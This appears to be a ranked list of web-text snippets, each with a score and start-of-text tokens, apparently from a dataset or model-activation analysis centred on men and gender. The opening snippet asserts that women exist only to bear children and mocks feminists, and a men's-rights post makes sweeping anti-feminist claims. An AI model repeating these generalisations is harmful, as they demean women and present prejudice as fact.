husband and having kids, they kit themselves out like extras from the freak show and scream at men for not loving them. Instead of tending to children, they talk endlessly about their unused female parts. + +Much of what is going wrong in the West is some version of what we are seeing with the endless hashtag campaigns run by women. The female of our species has a biological purpose. That’s to find a suitable mate, bear children and raise them to sexual maturity. That’s nature’s assignment to women. Anything else is either in support of that purpose, frivolous or in opposition to biological necessity. + +The result of a century of feminism is a society that works against the interests of women. Young men +================================================================================ +Rank = 55; Score = 432128.0 +<|begin_of_text|>Photo: Michael Segalov + +Theresa May, Donald Trump, Brexit, an uptick of racism and hate crimes, rising inflation, increasing property prices and the floundering pound. A lot has happened this year that you probably want to forget about, and the traditional way to forget – of course – is to drown your memory in booze, and stifle any remaining thoughts with one or more of your favourite drugs. + +But as you might have already surmised, that's not always the best course of action. Dr Sheri Jacobson, clinical director of Harley Therapy, points out that both drugs and alcohol actually provide a temporary high that, over a long-term basis, keeps the user in a cycle of low moods. + +"Alcohol, for example, is a depressant, and it actually messes with the neurotransmitters in your brain, including the one needed to help you keep anxiety at bay," she says. So while drinking is often thought of as a way to "wind down" after a demanding day, in fact it can have quite the opposite effect. + +"If you already had any kind of mental health issue, like anxiety or bipolar disorder, substances are likely to make your condition worse, not better," says Dr Jacobson. "And if you have a genetic risk for a mental disorder, drug or alcohol use gives you at a higher chance of developing it." + +Drug and alcohol misuse is particularly prevalent in men. In 2014, men accounted for approximately 65 percent of all alcohol-related deaths in the UK, and in 2014-2015, 74 percent of hospital admissions with a primary diagnosis of drug-related mental and behavioural disorders were men. Depression and anxiety are common in individuals with a history of substance abuse, and the Journal of Clinical Psychiatry suggests that one in three adults who abuses drugs or alcohol is also affected by depression. + +Male mental health might be more talked about than ever in the media, but last month the charities Mind and Rethink Mental Illness released a study from their campaign Time to Change showing that 54 percent of male teenagers suffering from mental health issues chose to keep their problems to themselves. Despite more and more celebrities outing themselves as sufferers of depression and anxiety, and media-run campaigns encouraging men to talk about what's troubling them, many are still keeping things to themselves. + +There are, of course, many reasons why that might be. But I'm personally aware of a number of men whose mental health problems have been clouded by pints, drugs, hangovers and comedowns +================================================================================ +Rank = 56; Score = 430080.0 +<|begin_of_text|>There seems to be a widespread misconception in the Orthodox world that the upcoming holiday of Simchat Torah is a “men’s holiday.” + +I can understand the confusion, stemming from what we celebrate and how we celebrate it. Simchat Torah has evolved as a celebration of the annual cycle of weekly Torah readings—readings which, in Orthodox shuls, occur purely on the men’s side of the mechitza (divider). And we celebrate it by taking all the Torah scrolls out of the ark—also on the men’s side—and dancing seven circuits, or hakafos, with them. There is much joyful singing, generally in a masculine timbre, and the dancing men take turns holding the heavy scrolls. + +READ: This is the Torah + +With so much action naturally taking place on the other side, I can understand—sort of—why things tend to be much less lively on my side of the mechitza. Depending on the community, the women might dance, but it is rarely as exuberant, as populated, or as sustained as the men’s dancing. My childhood memories of the holiday involve a core group of women who enjoyed dancing and would try to get things going, while most of the women might join for a few minutes in between their primary activities of chatting, chasing sugared-up children (did I mention excessive candy often plays a role in the celebrations?), and watching the men. From what I have experienced and heard since, my shul was fairly typical, though in many places the women don’t dance at all—or even show up. + +My husband likes to tell of the girl he once dated who was surprised at the suggestion that she might go to shul on Simchat Torah. “Why would I go?” she asked. “I have no one to watch!” For her, I think, it was accepted as a matter of course that dancing on Simchat Torah is what men do, and she wouldn’t have ever imagined that she could—or should—have a part in it. + +For others, the questions around women and Simchat Torah are more fraught—and many focus on the Torah scrolls themselves, arguing that if the women can’t dance with a Torah, then they feel excluded, like their dancing is pointless. Indeed, in more recent years, as this sort of discomfort with gender disparities has increased, many rabbis have concluded that there is no real halachic problem with a woman carrying a Torah scroll, and in some shuls a scroll or two will be passed to the women’s side for the dancing +================================================================================ +Rank = 57; Score = 430080.0 +<|begin_of_text|>Jurassic Park's Dr Ellie Sattler is not impressed. + +Two female scientists have had their research paper rejected by a peer review journal because it wasn't co-authored by a male. + +That's right. + +Dr Fiona Ingleby from the University of Sussex and Dr Megan Head from ANU wrote a paper about how gender differences influence the experiences of PHD students transitioning to post-doctoral studies, and submitted it to PLoS One, a journal from the Public Library of Science. + +In an incredible demonstration of their point and some amazing comedic use of irony (actually not funny though), the reviewer's response was that they should get a male (any male, really) to co-author the study, "to serve as a possible check against interpretations that may sometimes be drifting too far away from empirical evidence into ideologically-based assumptions". Just... wow. + +Advertisement + +It gets worse, though. The reviewer actually makes some rather helpful suggestions for answers to their hypothesis these doctors had obviously not considered, due to being women. + +For example, perhaps male doctoral students co-author more papers on average than women because men can run faster than women. + +Or perhaps these woman researchers hadn't considered that men get published in better journals than women because men work longer hours, because they have better stamina. + +This is actually what the guy said. An incredulous Dr Fiona Ingleby tweeted screenshots, because empirical evidence. + +Reviewer’s conclusion: we should get a man’s name on MS to improve it (male colleagues had already read it) (2/4) pic.twitter.com/fhiyzNG0R8 — Fiona Ingleby (@FionaIngleby) April 29, 2015 + +…and this is a bit hypocritical given the reviewer’s own ideological biases throughout the review, for example: (3/4) pic.twitter.com/aJ8aTIRdYL — Fiona Ingleby (@FionaIngleby) April 29, 2015 + +Journal has been given three weeks so far to respond to our appeal. If there was ever an argument for double-blind peer review… (4/4) — Fiona Ingleby (@FionaIngleby) April 29, 2015 + +After a significant social media backlash, the Public Library of Science has accepted its reviewer's comments were out of line, and promised to consider the appeal to the decision. + +@FionaIngleby @PLOS regrets the tone, content and spirit of this review; your appeal is in process & we're reviewing the matter. +================================================================================ +Rank = 58; Score = 425984.0 +<|begin_of_text|>Cinema has long struggled with representing women as actual complex human beings. Writer Kelly Sue DeConnick once noted that a disturbing number of female characters in modern stories (including movies) fail to pass The Sexy Lamp test. This means the majority of female characters in Hollywood can pretty much be replaced with a “sexy lamp”, as they don’t accomplish anything and only serve the purpose of being a good-looking prop for men to fight over. + +source + +CAPTION: Pictured: Hollywood’s idea of an empowered, independent woman. + +What you might not know is that some of these women were far less lamp-like in the original stories that their movies were based on. A lot of times, a TV or movie adaptation of a story will go out of it’s way to make the leading lady more passive and give her accomplishments to a male character + +There can be multiple reasons for this and generally all of them are dumb. It could be that the producers wanted to take away the lady’s screentime to give the male lead more time to flex his bulging biceps; it could be they felt they absolutely had to have a helpless woman to tug at the audience’s tender heartstrings or in some cases, they simply could not even fathom the idea of a woman actually accomplishing anything. + +These seven examples explore all the weird and dumb ways women can go from an active characters in the original to alluring light fixtures in the film version. + +Violet Baudelaire in A Series of Unfortunate Events + +source + +Caption: Just an innocent tale about a creepy old guy relentlessly pursuing three children. + +Lemony Snicket’s bizarre children’s books, A Series of Unfortunate Events, followed the macabre adventures of three orphan siblings as they were tormented by the evil Count Olaf. The orphan siblings in question were Violet, who was basically MacGyver with a bow; Klaus, the character who tricks kids into buying up the series when they see him on the cover and think he’s Harry Potter, and Sunny, a baby with freaking shark teeth who will haunt your nightmares. + +The books were pretty popular, proving what everyone already knew: kids are sadists who love to consume stories about suffering. So in 2004, a movie based off the first three books was made. + +source + +Caption: AKA “Jim Carrey’s Twitchy Eyebrows the Movie” + +The climax of the movie was based off the climax of The Bad Beginning, the first book. In a scheme to gain the inheritance that will go to Violet when +================================================================================ +Rank = 59; Score = 425984.0 +<|begin_of_text|>As a product of the University of California – Go Aggies! – I will tell you from first hand that the UC demographic is all Asian. As it stands, having four- to five-times the amount of Asians represented in California’s premier school system isn’t necessarily a bad thing. But the breakdown is certainly telling in terms of where balance is needed. In a state funded education system where Asians make up only 12.4% of California’s population, Asians make up 40% of the university’s student body. + +To address the imbalance, UC regents have decided to relax admission standards in order to expand the UC applicant pool. + +As it stands, Fall 2008 admissions data from UC schools indicate the following breakdown: + +University of California, Berkeley + +Asian-American: 46% + +White: 30.2% + +Latino: 11.5% + +African-American: 3.7% + +University of California, Los Angeles + +Asian-American: 38% + +White: 34% + +Latino: 15% + +African-American: 3% + +University of California, Davis + +Asian-American: 42% + +White: 36% + +Latino: 12% + +African-American: 3% + +University of California, Irvine + +Asian-American: 51% + +White: 24% + +Latino: 12% + +African-American: 2% + +University of California, Santa Barbara + +Asian-American: 19% + +White: 53% + +Latino: 19% + +African-American: 3% + +Effective in 2012, UC Regents have changed the admissions requirements and process to drop the SAT subject test (SAT II) and to extend automatic admissions to the 91st percentile of California high school students. + +Applicants are currently required to maintain a certain GPA and SAT composite score that combines SAT and SAT II scores in order to qualify for UC. The new requirements will lax the current standards. But UC estimates the new changes would qualify 1,800 more black, 7,500 more Latinos, 15,000 more whites, and 4,000 Asian-American students. + +Although the test is aimed to increase UC’s applicant pool, Asian- and African-American students benefit the least. Especially since Asian-Americans perform better on the soon-to-be dropped SAT II subject test and other minority and white students perform better on the SAT (I) reasoning test, Asian American political pundits suggest the new requirements will greatly reduce the number of Asian Americans in UCs. + +Further, the Asian-American community is most outraged in UC’s lack of outreach +================================================================================ +Rank = 60; Score = 425984.0 +<|begin_of_text|>If you want any proof that feminists hate men, just look at how they react in disgust towards the phrase “Men’s Rights Activists”. Many of them deny men face discrimination and that men have all the power in society and use it to oppress women. + +So what is a Men’s Rights Activist? Well if you ask a feminist, it is anyone who is against feminism. They literally use this term to describe any anti-feminist- The Amazing Atheist, Thunderf00t, Sargon of Akkad, Milo Your banana is a police, Pick Up Artists, GamerGaters; really anyone disagrees with them. You see the headlines, such as Men’s Rights Activists boycott Star Wars and Men’s Rights Activists joined the Alt-Right. + +Most people who get called MRAs are not actually MRAs- they don’t identify as such, and don’t advocate for men’s issues, or at least it’s not a primary focus of theirs. But there are self-described Men’s Rights Activists. I consider myself one for instance, and we generally believe in Men’s Equality- with Anti-Feminism as just a side focus. So how did all these other guys get lumped in? + +It all really started in 2012, when the SPLC but a bunch of Websites on a watchlist. Most of them were not Men’s Rights sites, but a few were lumped in such as A Voice for Men. Despite these sites being vastly different from each other in what they stand for, the Leftist SPLC placed them together to smear them. + +On March 2014, when the Isla Vista Shootings occurred. The perpetrator, Elliot Rogers, was a failed pick-up-artists who wanted revenge on women for not dating him, as well as the men who did get into relationships. Elliot had zero connection to the Men’s Rights Movement and wasn’t even involved in much anti-feminism. However shortly after this event, media outlets described him as a Men’s Rights Activist. My pal, Bane666au covers this greatly in his video series “The Propoganda of Toxic Feminism” named after feminists described “Toxic Masculinity” as the reason why Elliot went on his rampage. + +But the short story is that it was originally covered by a DailyKos article written by Ollie Garkie which claims Elliot Rogers was influenced by the Men’s Rights Movement. Hundreds of media outlets and thousands of feminists took this as truth and used it as an opportunity to smear Men’s +================================================================================ +Rank = 61; Score = 425984.0 +<|begin_of_text|>Sport, we’re told, lies at the heart of what it means to be Australian. But what in reality does this mean? The Conversation, in partnership with Griffith Review, is publishing a series of essays exploring the role and place of sport in Australian life. + +Tasmania’s northwest coast city of Burnie has long suffered high unemployment. In 2015, however, residents were shocked to find that unemployment among young people in Burnie had topped the nation: 21% of young men aged between 15 and 25 were neither employed nor studying. Just under half of all young people did not finish high school. And between 2011 and 2015, the number of Newstart recipients had grown by 40%. + +Hard hit by the shrinking manufacturing sector, youth unemployment in the region was forecast to swell even further in the years ahead, to 33%. For young Burnie residents, the future looked bleak indeed. + +Alarmed by these findings, the leadership of Australian rules football in Tasmania surveyed Burnie AFL players. They wanted to know how many of its players were unemployed and not studying. + +They feared the worst. With Burnie football players in the bullseye of the most at-risk demographic – men under the age of 30, some from the lowest socioeconomic ranks – football officials were worried about their own. + +What they found surprised even them. Club officials reported that not one of their players was unemployed. All were either employed or in full-time education. The employment (or studying) rate for AFL players in a city with the nation’s highest unemployment rate was 100%. + +Asked to explain this remarkable disparity between young footballers and the rest of the community, club officials pointed to two simple factors. + +First, young men who play football gain vital skills that make them employable. They show up on time, every time; they’ve learned how to work in teams; they understand that hard work and self-discipline lead to improvement; they are confident; they can cope with pressure; and they are fit and healthy – they don’t allow alcohol, junk food or drugs to overtake their lives. + +Second, they are part of a social network that supports them. When faced with a risk of losing their job, someone from the club would connect these young people to someone else looking for reliable and capable young employees. Club members could recommend the young player for employment and, because of the footballers’ basic skills, be confident in doing so. The club officials don’t get paid to help; they just do it, because they +================================================================================ +Rank = 62; Score = 425984.0 +<|begin_of_text|>Circuits and Electronics + +6.002 introduces the fundamentals of the lumped circuit abstraction. Topics covered include: resistive elements and networks; independent and dependent sources; switches and MOS transistors; digital abstraction; amplifiers; energy storage elements; dynamics of first- and second-order networks; design in the time and frequency domains; and analog and digital circuits and applications. Design and lab exercises are also significant components of the course. 6.002 is worth 4 Engineering Design Points. + +Linear Integrated Circuits + +This course will focus on the design of MOS analog integrated circuits with extensive use of Spice for the simulations. In addition, applications of analog integrated circuits will be covered which may include such topics as RF amplification, discrete and continuous time filtering and A/D conversion. Though the focus will be on MOS implementations, comparison with bipolar circuits will be given. + +Digital Integrated Circuits + +Initially my goal was to focus just on physics, maths and computer science lectures but I have been getting emails lately asking me to post other lectures as well.Here are all the engineering lectures I could find: + +This course is an introduction to digital integrated circuits. The material will cover CMOS devices and manufacturing technology along with CMOS inverters and gates. Other topics include propagation delay, noise margins, power dissipation, and regenerative logic circuits. We will look at various design styles and architectures as well as the issues that designers must face, such as technology scaling and the impact of interconnect. Examples presented in class include arithmetic circuits, semiconductor memories, and other novel circuits. + +The course will start with a detailed description and analysis of the core digital design block, the inverter. Implementations in CMOS will be discussed. Next, the design of more complex combinational gates such as NAND, NOR and EXORs will be discussed, looking at optimizing the speed, area, or power. The learned techniques will be applied on more evolved designs such as adders and multipliers. The influence of interconnect parasitics on circuit performance and approaches to cope with them are treated in detail. Substantial attention will then be devoted to sequential circuits, clocking approaches and memories. The course will be concluded with an examination of design methodologies. + +Integrated Circuits for Communications + +Analysis and design of electronic circuits for communication systems, with an emphasis on integrated circuits for wireless communication systems. Analysis of noise and distortion in amplifiers with application to radio receiver design. Power amplifier design with application to wireless radio transmitters. Class A, Class B, and Class C power amplifiers. +================================================================================ +Rank = 63; Score = 421888.0 +<|begin_of_text|>Depending on who you ask, Occupy Wall Street is either the inevitable outpouring populist outrage resulting from decades of corporate greed and abuse or a goalless collection of spoiled unemployed hippie sex fiends who just want to complain about something. Regardless of what you think about the protesters, the cause has grown from one mid-September march to a bona fide movement in dozens of cities. With voices from the far right claiming that the people protesting abuse of power by white men are mostly other white men, how are women in the movement making sure their voices aren't drowned out? + +The Occupy Wall Street movement seems, to the outsider, to be about almost every possible progressive pet issue, but at its core, it's about taking up physical space. Much of the actions of government and business now occur within the virtual realm— numbers flashing across a screen, computer-based algorithms performing transactions that pass billions of dollars from one organization to another in microseconds, human-designed formulas denying actual humans medical coverage based on medical history and risk factors. The 99% of people who are currently getting hosed by the country's wealthiest 1% can't reclaim the virtual space that was never theirs, but they can assert themselves in the physical space that's rapidly being taken from them, sort of like how female participants in this year's SlutWalk movement publicly reclaim their bodies. + +The movement's white male bent has prompted some female activists to opt not to participate in Occupy Wall Street at all. Over at In These Times, Sady Doyle isn't so sure that OWS cares about women, noting that the same men who had poked fun at her activism before OWS were now imploring her to join them in protest. She resents the movement's ostentatious goals and overestimation of its importance. Further, they didn't support her and other women involved in Slutwalk, so why would she support them? She writes, + +The men I knew who had been Occupying Wall Street were still not there with me at the year's most heavily promoted anti-rape protest. I still couldn't rationally expect them to be. The "next global feminist movement" still wasn't moving strongly enough to occupy the city for three weeks. Or even one whole day. + +Other activists are choosing the participate in the movement as reluctant educators. Racialicious contributors Hena Ashraf and Manissa McCleve Maharawal dropped in on Occupy Wall Street in late September. The two were initially pleasantly surprised by the crowd's diversity and kindness. They just so happened to be +================================================================================ +Rank = 64; Score = 421888.0 +<|begin_of_text|>There is this thing that people (mostly men) love to do on Twitter, something other than harass women and send DMs of their half chubs. It’s called threading, and it’s one of the many things ruining my Twitter experience. + +Threading happens when someone has a lot of thoughts or feelings on a particular topic, so many that they can’t fit them all into 140 characters. So, ostensibly to help readers follow along on their train of thought, they thread the tweets together by replying to themselves. Sometimes they even use numbers! + +Advertisement + +Yesterday, a man named Eric Garland, a “strategic analyst for businesses and government agencies” with around 30K followers, decided it was time for some “game theory” without consultation from the rest of the internet (it wasn’t time and will never be time). The ensuing political rant is so insane and prolific it took up almost 6 pages when posted into a Google doc, and included a map. I dare you to read his thread in full and try to still respect yourself. + +The content of Garland’s self-proclaimed “” isn’t really important, as most aren’t. They are typically “intellectual” dribblings from men who love Explaining Things To Me (essentially a subtype of Online Mansplaining). These are people who want their ideas to take up the absolute most space possible. Like Manspreading, but of digital space. + +Enter: Manthreading. + +Manthreading is when Jeet Heer, a senior editor at The New Republic, thinks people fucking vegetables warrants 21 points: + +Advertisement + +Manthreading is when Josh Marshall, editor and publisher of Talking Points Memo, decides to fight back against the alt-right’s Nazi Pepe by suggesting that Kermit be a political icon for good and using the hashtag #ImWithKer. (It’s so embarrassing, and was worse when he had a kermit avi): + +Or how about Venture Capitalist Marc Andreessen deciding that four threads on Stagnation Theory were not enough, and adding a fifth, the Stagnation Theory Wrap-up (5/5): + +Advertisement + +The best thing about Manthreading is how unnecessary it is. There are other tools—blogs—you can use if your have more than a few tweets worth of content to spew onto the internet. Twitter co-found Ev Williams fucking built Medium for this exact reason. Twitter...but longer. Wyd, Manthreaders? + +The thing about Manthreaders, though, is that they want their +================================================================================ +Rank = 65; Score = 421888.0 +<|begin_of_text|>Energy development is the field of activities focused on obtaining sources of energy from natural resources. These activities include production of conventional, alternative and renewable sources of energy, and for the recovery and reuse of energy that would otherwise be wasted. Energy conservation and efficiency measures reduce the demand for energy development, and can have benefits to society with improvements to environmental issues. + +Societies use energy for transportation, manufacturing, illumination, heating and air conditioning, and communication, for industrial, commercial, and domestic purposes. Energy resources may be classified as primary resources, where the resource can be used in substantially its original form, or as secondary resources, where the energy source must be converted into a more conveniently usable form. Non-renewable resources are significantly depleted by human use, whereas renewable resources are produced by ongoing processes that can sustain indefinite human exploitation. + +Thousands of people are employed in the energy industry. The conventional industry comprises the petroleum industry, the natural gas industry, the electrical power industry, and the nuclear industry. New energy industries include the renewable energy industry, comprising alternative and sustainable manufacture, distribution, and sale of alternative fuels. + +Classification of resources [ edit ] + +Open System Model (basics) + +Energy resources may be classified as primary resources, suitable for end use without conversion to another form, or secondary resources, where the usable form of energy required substantial conversion from a primary source. Examples of primary energy resources are wind power, solar power, wood fuel, fossil fuels such as coal, oil and natural gas, and uranium. Secondary resources are those such as electricity, hydrogen, or other synthetic fuels. + +Another important classification is based on the time required to regenerate an energy resource. "Renewable" resources are those that recover their capacity in a time significant by human needs. Examples are hydroelectric power or wind power, when the natural phenomena that are the primary source of energy are ongoing and not depleted by human demands. Non-renewable resources are those that are significantly depleted by human usage and that will not recover their potential significantly during human lifetimes. An example of a non-renewable energy source is coal, which does not form naturally at a rate that would support human use. + +Fossil fuels [ edit ] + +Fossil fuel (primary non-renewable fossil) sources burn coal or hydrocarbon fuels, which are the remains of the decomposition of plants and animals. There are three main types of fossil fuels: coal, petroleum, and natural gas. Another fossil fuel, liquefied petroleum gas (LPG), is principally derived from the production of natural gas. Heat +================================================================================ +Rank = 66; Score = 421888.0 +<|begin_of_text|>The court fight between Apple and the FBI prompted a slew of letters and legal briefs last week from outside parties, including many tech companies and privacy groups. But a particularly powerful letter came from a collection of racial justice activists, including Black Lives Matter. + +The letter focused on potential civil rights abuses, should the FBI gain the power to conscript a technology company into undermining its own users’ security. + +“One need only look to the days of J. Edgar Hoover and wiretapping of Rev. Martin Luther King, Jr. to recognize the FBI has not always respected the right to privacy for groups it did not agree with,” wrote the signatories, including arts and music nonprofit Beats, Rhymes & Relief, the Center for Media Justice, the Gathering for Justice, Justice League NYC, activist and writer Shaun King, and Black Lives Matter co-founder and Black Alliance for Just Immigration executive director Opal Tometi. + +Those tactics haven’t ended, they argue. “Many of us, as civil rights advocates, have become targets of government surveillance for no reason beyond our advocacy or provision of social services for the underrepresented.” + +In Washington and Silicon Valley, the debate over unbreakable encryption has an aura of elite, educated, mostly male whiteness — from the government representatives who condemn it to the experts who explain why it’s necessary. + +But the main targets of law enforcement surveillance have historically been African-American and Muslim communities. + +Malkia Cyril, co-founder of the Center for Media Justice, one of the letter’s signatories, gave a speech at one of several nationwide protests outside Apple stores two weeks ago, supporting the tech giant and pointing out the FBI’s history of surveilling black activists. “In the context of white supremacy and police violence, Black people need encryption,” she wrote in a tweet. + +Others representing Black Lives Matter attended protests across the country, including in front of the FBI headquarters itself — the J. Edgar Hoover building — in downtown Washington, D.C. + +“I’ve been reviewing the Apple vs. FBI lawsuit and now realize how important it is that that Apple wins the lawsuit. #DontHackApple,” DeRay Mckesson, Baltimore mayoral candidate and prominent Black Lives Matter organizer, tweeted on February 22. “When I was arrested in protest, my iPhones were in police custody. They were secure. The police couldn’t access my info,” he added. “If Apple has to create an insecure iPhone iOS app, all of the private data that we store on our phones is at risk.” + +The letter to California federal Mag +================================================================================ +Rank = 67; Score = 421888.0 +<|begin_of_text|>Anorexia nervosa is a mental illness characterised by a distorted body image, an extremely low body weight, and a fear of gaining weight. While anorexia affects all people, it is significantly more prevalent among women. Even though it is relatively rare, its effects are devastating. + +Anorexia is notoriously difficult to treat. Across all mental illnesses, it has the highest rate of mortality, so research in this area is crucial. + +It is not possible to determine a single cause of anorexia. Nevertheless, risk factors associated with the disease are well known. These include genetics, psychological predisposition, and social or cultural factors. + +Increasingly, our social and cultural interactions take place online. It is, therefore, not surprising that online interactions intersect with mental illnesses generally, and anorexia specifically. This is particularly when taking into account that the average person who suffers from anorexia tends to be relatively young. + +“Pro-ana” websites endorse anorexia as a positive choice, as opposed to a mental illness. Other variants include “pro-mia” websites, which endorse bulimia. These sites predominantly target women. + +They promote a very thin body as the type that women must have. They give advice about how to become anorexic, how to hide an eating disorder from others and how to diet. The websites contain images of extremely thin women, which are sometimes altered to make the women appear thinner. + +These websites have a long history. In 2001, Time Magazine noted the existence of 400 such sites. Efforts to eradicate these sites are just as old. AOL and Yahoo tried to ban pro-ana material that same year. + +These attempts have not been successful. Rather, the “survival” of such networks has required adaptation. + +In practice, this involves these networks “turning inwards”, as “subgroups of ana-mia bloggers will exchange messages, links and images among themselves and exclude other information sources”. Present estimates suggest there may be millions of pro-ana websites. + +Like other online interactions, pro-ana websites have become integrated with social media. + +The present legal framework + +In Australia, there is little regulation of pro-ana material. There are general criminal offences that relate to causing bodily harm. This includes causing a person to have a disease or disorder. It follows that anorexia, while a mental illness, might nevertheless constitute bodily harm. + +However, it is not likely that these offences will criminalise the publication of pro-ana material. The causes of anorexia are complex +================================================================================ +Rank = 68; Score = 417792.0 +<|begin_of_text|>Neal Cassady won't go away. The wild young man dashing madly down the highways of experience, liberated from conventional restraints and searching for sex and salvation in the American night, sent chills of horror down the spine of respectable society in 1957, when Kerouac immortalized him as Dean Moriarty in On the Road. A few years later, just when America thought it was safe to drive again, he came roaring back, in the flesh this time and crazier than ever, as the pilot of the bus Ken Kesey and his "Merry Pranksters" took cross-country in the psychedelic 60s. His mad appetite for pleasure and his speed-crazed monologues, recounted faithfully by Tom Wolfe in The Electric Kool-Aid Acid Test, made him a counterculture folk hero. Survivors of that era still speak and write of him with reverence. + +Cassady has insinuated himself into the popular imagination beyond the wildest dreams of even his most ardent admirers. Think of the mythologized passions and highway death of James Dean, the apocalyptic persona and imagery of Jim Morrison, and the more recent road-to-the-promised-land visions of Springsteen and his various clones. Several generations of movie and TV roadrunners, from the adventure seekers on Route 66 through the postapocalyptic mutants of Road Warrior, have gotten much of their fuel from Neal at the wheel of his endless succession of gas-guzzling chariots. + +Yet the "real" Cassady has remained elusive. As powerful as his personality was, he's come to seem ephemeral, an empty mirror in which everyone saw images of his or her own choosing. Even Cassady's most devoted disciples remember him selectively. Allen Ginsberg has said that Ken Babbs, a Kesey associate and an editor at Kesey's journal Spit in the Ocean, once turned down a manuscript Ginsberg submitted describing the first time he and Cassady slept together. Babbs apparently wanted nothing to interfere with his cherished image of Cassady as heroic heterosexual. + +Most of the Cassady legend has consisted of fictionalized or anecdotal accounts, set in a romanticized Beat or hippie era and usually related by adoring acolytes, mostly men. Women--whether Cassady's innumerable girlfriends and three wives or female critics unimpressed by his exploits as cocksman extraordinaire--have by and large remained pointedly silent. + +That silence has now been broken by Carolyn Cassady, Neal's +================================================================================ +Rank = 69; Score = 415744.0 +<|begin_of_text|>Senate Republicans’ plan to repeal and replace Obamacare, called the Better Care Reconciliation Act, would make it harder for Americans to access health care, and specifically make it harder for women to access crucial health benefits — from birth control to maternity coverage. This may come as no surprise, given that the bill was written by 13 men. + +The Affordable Care Act made several changes to improve women’s access to health care in the US. The law expanded contraceptive access, required (at long last) private small-group insurers to cover maternity care, and broadened the number of people who could access Medicaid — which pays for half of all births in this country. + +These advances mattered to public health when you think about how poorly American women fare compared with women in other rich countries when it comes to several health outcomes. (We have some of the worst maternal health and mortality outcomes in the developed world, and life expectancy for women is going down.) They also gave women some relief from worrying about the cost of accessing very basic health services. + +Doctors and reproductive health advocates are saying the GOP’s Senate health care bill looks like a big step backward. On Thursday, the bill was released to the public after a secretive deliberation process, and the Senate is expected to cast a vote on it next week. Here are the four key ways this bill could undermine the health of American women. + +1) The bill overhauls and dramatically cuts Medicaid — which covers half of all US births + +Medicaid is incredibly important for reproductive health: The program for low-income Americans pays for half of all births, including two-thirds of unplanned births. Three-quarters of the public dollars spent on family planning are Medicaid dollars, and in 17 states, Medicaid programs also cover abortion with state dollars. + +The core idea behind the Better Care Act is cutting spending on health care for the poor to finance tax cuts for the rich, as Vox’s Andrew Prokop explained. In practice, this means phasing out Medicaid expansion (which made more people eligible for the program) by 2021. + +But that’s only the beginning. “Once the Medicaid expansion is repealed, Republicans get to work on Medicaid itself, tying the amount it can spend to an inflation index that lags behind how much health care actually costs,” Vox’s Ezra Klein explains. This will involve converting Medicaid to a “per capita cap” system, which means states would only allot a fixed sum of money to each enrollee, instead of covering all their medical bills. “The result is Medicaid will be able to cover fewer people and cover +================================================================================ +Rank = 70; Score = 413696.0 +<|begin_of_text|>Myanmar authorities have been able to rescue 102 victims of human trafficking from China so far this year, a police official on the Anti-Trafficking Task Force told 7Day. Legal action has also been taken against the 60 men and 114 women who were acting as brokers in the 70 cases that have been recorded since January. + +With only five male victims, women made up an overwhelming majority of the victims. Past reports show that female victims are forced to become sex workers, while men are used as laborers, and children as beggars. + +Despite the good news, activists feel that simply rescuing individuals from these situations is just the first step, and that more should be done to break the terrible cycle. + +Tun Tun, an anti-human trafficking activist currently working in China told 7Day: “To be honest, if these individuals did this [went to China] because they couldn’t find work here, then the government needs to help create jobs for them once they’re brought back [home]. Otherwise, these people will find another illegal way to go back to China, and when they go back, they’ll also take other women with them and act as their broker.” + +The majority of Myanmar victims are women who come from low-income families in remote villages. These women are promised better paying jobs by brokers, only to be sold off to Chinese farmers once they make it across the border. According to police reports, victims are ‘priced’ based on their age; women who are virgins are also priced higher than those who are not. + +When the one-child policy was still in place, Chinese men would take Myanmar brides and force them to get pregnant until they gave birth to a son. One victim who spoke to the Myanmar Times in 2013 said that the men would kill the child if it was a girl. + +An anti-human trafficking law was only first introduced in Myanmar in 2005. Despite increased efforts to prosecute offenders, many cases still remain unsolved.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 71; Score = 413696.0 +<|begin_of_text|>We’re all getting fatter, but Irish men are getting fatter fastest. The prognosis is poor: by 2030, 58 per cent of Irish men are expected to be obese, topping the scale of all European countries, according to a UK-based study published last year. If you add the projected number of overweight men to the Irish total, the figure is even worse, coming in at a gut-busting 90 per cent. + +Now a new review of men’s food behaviour by Safefood, the all-Ireland health body, shows that we’re well on our way to fulfilling that frightening prediction. It points out that 70 per cent of men in the Republic are currently overweight or obese, compared with 50 per cent of women, as are 69 per cent of men in the North, against 57 per cent of women. + +The big question, of course, is why. What is it about living on this island that makes Irish men, in particular, stuff themselves silly, with so little regard for the health consequences? + +Many reasons – from simple greed or laziness, to more complex speculations about how men respond to stress, or marriage, or whether they are especially sensitive to the effects of chemicals such as phthalates, commonly found in household products – have been forwarded for male weight gain. + +Dr Aileen McGloin, from Safefood, has a list of contributing factors as long as your arm, all of which, it seems, can be summed up by one single sentence. “Men,” she says, “live in a different food world.” + +A different food world? Hang on, don’t we all occupy the same universe of choices, populated by temptations like fat-laden ready-meals and 